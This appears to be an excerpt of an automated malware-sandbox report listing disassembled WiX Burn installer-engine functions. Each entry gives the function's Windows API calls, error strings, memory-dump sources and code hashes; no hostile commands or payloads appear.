                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$ErrorFreeLastProcesslstrlen
                                                                                                                                                                  • String ID: Failed to allocate buffer for raw registry value.$Failed to expand registry value: %ls$Failed to get size of raw registry value.$Failed to read raw registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 1805815496-598890354
                                                                                                                                                                  • Opcode ID: a796a6b99c0b2294d029124998de427344aa86cea140b81449e42e4e5ccdc600
                                                                                                                                                                  • Instruction ID: e51e47d1274dcd5ab747243cfa5ac7aa30ac131d1b761996720567431a33578d
                                                                                                                                                                  • Opcode Fuzzy Hash: a796a6b99c0b2294d029124998de427344aa86cea140b81449e42e4e5ccdc600
                                                                                                                                                                  • Instruction Fuzzy Hash: DB41E431F42219BBDF21AF58CC5AFAE36ACAF87750F120050FA20AB180D3B4DD41CA90
                                                                                                                                                                  Function 00972B2E Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00972BBF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                  • String ID: Failed to read from source.$Failed to write to target.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 2738559852-3357669501
                                                                                                                                                                  • Opcode ID: 17ecefa86780ce380ac42544ec0744373727abf98cfda9ad0deddd91862bdd88
                                                                                                                                                                  • Instruction ID: de4a380def07eff7d2f353321e0ab05889f6087f0250f0091feca14986805536
                                                                                                                                                                  • Opcode Fuzzy Hash: 17ecefa86780ce380ac42544ec0744373727abf98cfda9ad0deddd91862bdd88
                                                                                                                                                                  • Instruction Fuzzy Hash: E341C973A10269ABDB21CF14CC41BEE73B8EF85751F0580A6B94DE7240D6B4DEC49BA0
                                                                                                                                                                  Function 0093E0A0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 0093E158
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 0093E162
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 2976181284-2861879377
                                                                                                                                                                  • Opcode ID: 8950b3c0c98c77a39e321f3bc978eb3f0ca8e743b73a7696b7ded0dc8a464e8d
                                                                                                                                                                  • Instruction ID: 13b5ff7069094a6df4e2d6af08f7fd635e702693c01a6c372e13e532a7b6e655
                                                                                                                                                                  • Opcode Fuzzy Hash: 8950b3c0c98c77a39e321f3bc978eb3f0ca8e743b73a7696b7ded0dc8a464e8d
                                                                                                                                                                  • Instruction Fuzzy Hash: F2319075B0421ABFDB20DFA8DC85EAAB7A8FB08754F048615F915A7291E370ED10CB90
                                                                                                                                                                  Function 009765AE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open policy registry key., xrefs: 00976626
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 009765DD, 00976635
                                                                                                                                                                  • Failed to combine logging path with root path., xrefs: 009765CE
                                                                                                                                                                  • SOFTWARE\Policies\, xrefs: 009765BE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to combine logging path with root path.$Failed to open policy registry key.$SOFTWARE\Policies\$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                  • API String ID: 0-3658365009
                                                                                                                                                                  • Opcode ID: 0816bd8bde112c4508f5647abfe12806a35da99d3f0c5ae6039ad99bbfc4842c
                                                                                                                                                                  • Instruction ID: fc912bf18de6f7d7bc1fefa01bc4d0f740809431d727765ac3c42c4c3bcc8a0d
                                                                                                                                                                  • Opcode Fuzzy Hash: 0816bd8bde112c4508f5647abfe12806a35da99d3f0c5ae6039ad99bbfc4842c
                                                                                                                                                                  • Instruction Fuzzy Hash: F1110633B40725FBDB3166A48C0BFAE7A6C8B81B54F558011B908BA1D2D6B5CE50E6E1
                                                                                                                                                                  Function 0096BF20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091174A: WaitForSingleObject.KERNEL32(?,0093EA2A,00000000,?,0093EA2A,?,000000FF), ref: 00911756
                                                                                                                                                                  • GetExitCodeProcess.KERNELBASE(0097E7E8,00000000), ref: 0096BF6C
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091768F,?,000000FF,?,?,?,00000001), ref: 0096BF76
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CodeErrorExitLastObjectProcessSingleWait
                                                                                                                                                                  • String ID: Failed to get process return code.$Failed to wait for process to complete.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 1402617016-1146304469
                                                                                                                                                                  • Opcode ID: e23f5bfd4c21cb8b3e108b38860e5064c1b39abc6bf7a0e537362b67dec18ff0
                                                                                                                                                                  • Instruction ID: 97122dc85c51bad15fe6c3ad145acd63fb92b84167d9ddea3ef251fe88e2b5a7
                                                                                                                                                                  • Opcode Fuzzy Hash: e23f5bfd4c21cb8b3e108b38860e5064c1b39abc6bf7a0e537362b67dec18ff0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8201C433B4022977D7313554DC0AFAF2A5CDF45B94F050525FE08EA2A1F3658CD09AE0
                                                                                                                                                                  Function 00975CB8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00975CDB
                                                                                                                                                                  • StringFromGUID2.OLE32(?,00000000,00000027), ref: 00975D02
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFromStringUuid
                                                                                                                                                                  • String ID: Failed to convert guid into string.$UuidCreate failed.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\guidutil.cpp
                                                                                                                                                                  • API String ID: 4041566446-2208176607
                                                                                                                                                                  • Opcode ID: aeed640c6798ad7839b62fee4b3b820e5b13401c71ac56f4e32a0e7eb00e21f3
                                                                                                                                                                  • Instruction ID: 4a3ad941aef83d634fa3edc0b669419be90b4923af36606928b57b48a11a6e84
                                                                                                                                                                  • Opcode Fuzzy Hash: aeed640c6798ad7839b62fee4b3b820e5b13401c71ac56f4e32a0e7eb00e21f3
                                                                                                                                                                  • Instruction Fuzzy Hash: C301D276B44708B6EB2096B4CC4EFEFBBACDB8DB15F010425F609FB1C1E1A08D0486A1
                                                                                                                                                                  Function 00917D90 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to run per-machine mode., xrefs: 00917E48
                                                                                                                                                                  • Failed to run RunOnce mode., xrefs: 00917DDE
                                                                                                                                                                  • Failed to run embedded mode., xrefs: 00917E12
                                                                                                                                                                  • Invalid run mode., xrefs: 00917DA3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Invalid run mode.
                                                                                                                                                                  • API String ID: 0-2744884814
                                                                                                                                                                  • Opcode ID: 68cafeee8908ffa0219f357e2de18b708d0d5a673af4205c83cc198d92c761e2
                                                                                                                                                                  • Instruction ID: 099934d9fc748c212fb557cb8a6e8a3c07b8fb26f554e4be803cc85cbd24156c
                                                                                                                                                                  • Opcode Fuzzy Hash: 68cafeee8908ffa0219f357e2de18b708d0d5a673af4205c83cc198d92c761e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 8951A631B4922E96EB31AAA0CC16BEEB6B8BB40700F1445E6F548762C1DF748DC5DF91
                                                                                                                                                                  Function 00917B87 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00916570,00000000,?,?,?,?,?), ref: 00917BB5
                                                                                                                                                                    • Part of subcall function 0093D137: CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 0093D2CD
                                                                                                                                                                    • Part of subcall function 0093D137: CloseHandle.KERNEL32(00000000,?), ref: 0093D2E2
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
                                                                                                                                                                  • Failed to initialize COM., xrefs: 00917BC1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$Initialize
                                                                                                                                                                  • String ID: Failed to initialize COM.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 4100669059-4079876660
                                                                                                                                                                  • Opcode ID: 23de5398910aecc46a7cd1912db6ec50847b42ac5548ae5c15bc83fdf6451f87
                                                                                                                                                                  • Instruction ID: 689797c31181442ab8520c450c60933b8e801e37d61db36df1e5bef10c26f0ad
                                                                                                                                                                  • Opcode Fuzzy Hash: 23de5398910aecc46a7cd1912db6ec50847b42ac5548ae5c15bc83fdf6451f87
                                                                                                                                                                  • Instruction Fuzzy Hash: 54416431A0922D97EB30B6A0CC06BEEB2B8BB40305F1844D5B54862192DF745DC5DF92
                                                                                                                                                                  Function 00976814 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000006,00000006,00000070,00000000,00000000,00000000,00000000,00000000,?,?,0092C9FA,WiX\Burn,EngineWorkingDirectory,00000000), ref: 009768C4
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00976845, 009768A5
                                                                                                                                                                  • Failed to open policy key: %ls, xrefs: 00976839
                                                                                                                                                                  • Failed to open policy key: %ls, name: %ls, xrefs: 00976896
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                  • API String ID: 3535843008-3938230626
                                                                                                                                                                  • Opcode ID: f41b73965107f18a67ed80d971fdea3e35a7d3a142fc770eac1e789071c2c72d
                                                                                                                                                                  • Instruction ID: fe167d748972b1e8a75958ea2e984f7b9cde699480ac5922dca5d9e1db5342c0
                                                                                                                                                                  • Opcode Fuzzy Hash: f41b73965107f18a67ed80d971fdea3e35a7d3a142fc770eac1e789071c2c72d
                                                                                                                                                                  • Instruction Fuzzy Hash: F921F333A0072ABBEB315FD48C06BEE7A68DF44750F108135BA0836190E3B58D60E6D2
                                                                                                                                                                  Function 0097672F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0000001C,?,?,0092F5CE,WiX\Burn,PackageCache,00000000,0000001C), ref: 009767D9
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00976760, 009767BA
                                                                                                                                                                  • Failed to open policy key: %ls, xrefs: 00976754
                                                                                                                                                                  • Failed to open policy key: %ls, name: %ls, xrefs: 009767AE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                  • API String ID: 3535843008-3938230626
                                                                                                                                                                  • Opcode ID: 25c31ae387fc30837ebec9701e63a2c70f4fb9bbcf629bd39f20fb55b182de24
                                                                                                                                                                  • Instruction ID: 6bf8257bf054be4e40643b985bc73f061dcec7e0f1bcb25692fbbae93b151f2d
                                                                                                                                                                  • Opcode Fuzzy Hash: 25c31ae387fc30837ebec9701e63a2c70f4fb9bbcf629bd39f20fb55b182de24
                                                                                                                                                                  • Instruction Fuzzy Hash: C721F733A00729FBDF355EE4CC46BEE7A68AF40B99F158424FA0835190D3B94D60E6D1
                                                                                                                                                                  Function 009337DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00917659,?,?,00000001,00000000,00000000), ref: 00933844
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00917659,?,?,00000001,00000000,00000000), ref: 0093384A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorLastProcess
                                                                                                                                                                  • String ID: CreateProcessW failed with return code: %d$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                  • API String ID: 2919029540-2527134587
                                                                                                                                                                  • Opcode ID: 34326a401d9c847ec97b53b4b049ec173886e39c90c49a52534fd91f8dda945e
                                                                                                                                                                  • Instruction ID: 7c95595e11b390fb440b84806160e5c8200d2be42af7e3cf3a697ce42477bb55
                                                                                                                                                                  • Opcode Fuzzy Hash: 34326a401d9c847ec97b53b4b049ec173886e39c90c49a52534fd91f8dda945e
                                                                                                                                                                  • Instruction Fuzzy Hash: 93112E7AA40268B7EB219E528C4AEDF7E3DEFC4B50F054015FE04AB290E2748951CBB0
                                                                                                                                                                  Function 0093DFF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0093EB41: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0093E01F,?,?,?), ref: 0093EB69
                                                                                                                                                                    • Part of subcall function 0093EB41: GetLastError.KERNEL32(?,0093E01F,?,?,?), ref: 0093EB73
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 0093E02D
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0093E037
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                  • String ID: Failed to read during cabinet extraction.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 2170121939-336985225
                                                                                                                                                                  • Opcode ID: 289391f37aeebaaa57f8a5b074c93a847cbca066ffbe8e87347a356c669ce9df
                                                                                                                                                                  • Instruction ID: 9ee57dbaa92f56a7d03e467de73a76362700a956f515b0d6d3b9aea349d1db96
                                                                                                                                                                  • Opcode Fuzzy Hash: 289391f37aeebaaa57f8a5b074c93a847cbca066ffbe8e87347a356c669ce9df
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D110672A45229BBCB209F55DC09F8B7B6CFF48BA4F010114FD04AB291D270DC10DAD0
                                                                                                                                                                  Function 00973F70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteFile.KERNELBASE(?,00000000,00000000,0092CE5F,00000000,00000000,00000000,?,?,?,00972BE6,?,?,?), ref: 00973F95
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00972BE6,?,?,?), ref: 00973F9F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: Failed to write data to file handle.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 442123175-1082378667
                                                                                                                                                                  • Opcode ID: d9927f0b235e45664ca9028e5b249be584e19ddfe121eea660dafdd3d60f1dde
                                                                                                                                                                  • Instruction ID: 277fe857300e6c82afbdfa6a971ac327308d9cb240ed2262b359c77d0c000b11
                                                                                                                                                                  • Opcode Fuzzy Hash: d9927f0b235e45664ca9028e5b249be584e19ddfe121eea660dafdd3d60f1dde
                                                                                                                                                                  • Instruction Fuzzy Hash: FA017573B40228BBE7119A98DC85FEFB67CDB95B95F118119F908E7140E674DE0066E0
